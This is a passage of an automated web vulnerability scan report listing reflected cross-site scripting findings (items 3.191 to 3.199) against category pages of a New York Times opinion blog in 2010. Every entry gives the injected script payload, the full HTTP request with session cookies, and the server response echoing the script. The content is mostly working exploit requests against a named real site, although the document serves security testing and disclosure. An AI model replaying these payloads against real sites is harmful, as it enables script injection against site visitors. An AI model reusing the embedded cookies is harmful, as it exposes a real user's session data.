Path:	/category/errol-morris/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83ca0"><script>alert(1)</script>a5cfaeb2d66 was submitted in the REST URL parameter 3. This input was echoed as 83ca0\"><script>alert(1)</script>a5cfaeb2d66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/errol-morris/feed83ca0"><script>alert(1)</script>a5cfaeb2d66/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:18:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:18:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/errol-morris/feed83ca0\"><script>alert(1)</script>a5cfaeb2d66&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.191. http://opinionator.blogs.nytimes.com/category/errol-morris/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/errol-morris/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59656"><script>alert(1)</script>2a52a42ee88 was submitted in the REST URL parameter 3. This input was echoed as 59656\"><script>alert(1)</script>2a52a42ee88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/errol-morris/page59656"><script>alert(1)</script>2a52a42ee88/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:22:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:22:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/errol-morris/page59656\"><script>alert(1)</script>2a52a42ee88/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.192. http://opinionator.blogs.nytimes.com/category/fixes [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/fixes

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e161d"><script>alert(1)</script>0900389e500 was submitted in the REST URL parameter 2. This input was echoed as e161d\"><script>alert(1)</script>0900389e500 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/fixese161d"><script>alert(1)</script>0900389e500 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:25:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixese161d\"><script>alert(1)</script>0900389e500&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.193. http://opinionator.blogs.nytimes.com/category/fixes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/fixes/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8f0e"><script>alert(1)</script>bf23dd493d7 was submitted in the REST URL parameter 2. This input was echoed as d8f0e\"><script>alert(1)</script>bf23dd493d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/fixesd8f0e"><script>alert(1)</script>bf23dd493d7/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:25:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixesd8f0e\"><script>alert(1)</script>bf23dd493d7&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.194. http://opinionator.blogs.nytimes.com/category/fixes/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/fixes/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26950"><script>alert(1)</script>349cb5c2268 was submitted in the REST URL parameter 3. This input was echoed as 26950\"><script>alert(1)</script>349cb5c2268 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/fixes/feed26950"><script>alert(1)</script>349cb5c2268/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:22:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:22:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixes/feed26950\"><script>alert(1)</script>349cb5c2268&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.195. http://opinionator.blogs.nytimes.com/category/fixes/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/fixes/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66f1b"><script>alert(1)</script>7880d35a107 was submitted in the REST URL parameter 3. This input was echoed as 66f1b\"><script>alert(1)</script>7880d35a107 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/fixes/page66f1b"><script>alert(1)</script>7880d35a107/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:25:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:27 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixes/page66f1b\"><script>alert(1)</script>7880d35a107/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.196. http://opinionator.blogs.nytimes.com/category/home-fires [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/home-fires

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a972"><script>alert(1)</script>0a1b042274f was submitted in the REST URL parameter 2. This input was echoed as 1a972\"><script>alert(1)</script>0a1b042274f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/home-fires1a972"><script>alert(1)</script>0a1b042274f HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:26:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:26:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/home-fires1a972\"><script>alert(1)</script>0a1b042274f&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.197. http://opinionator.blogs.nytimes.com/category/home-fires/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/home-fires/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 465db"><script>alert(1)</script>c3c7c9b644e was submitted in the REST URL parameter 2. This input was echoed as 465db\"><script>alert(1)</script>c3c7c9b644e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/home-fires465db"><script>alert(1)</script>c3c7c9b644e/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:26:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:26:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/home-fires465db\"><script>alert(1)</script>c3c7c9b644e&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.198. http://opinionator.blogs.nytimes.com/category/home-fires/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/home-fires/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c78f"><script>alert(1)</script>40440eb34cb was submitted in the REST URL parameter 3. This input was echoed as 2c78f\"><script>alert(1)</script>40440eb34cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/home-fires/feed2c78f"><script>alert(1)</script>40440eb34cb/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:23:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:23:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/home-fires/feed2c78f\"><script>alert(1)</script>40440eb34cb&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.199. http://opinionator.blogs.nytimes.com/category/home-fires/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/home-fires/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2385"><script>alert(1)</script>2952f429861 was submitted in the REST URL parameter 3. This input was echoed as f2385\"><script>alert(1)</script>2952f429861 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/home-fires/pagef2385"><script>alert(1)</script>2952f429861/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:27:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:27:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.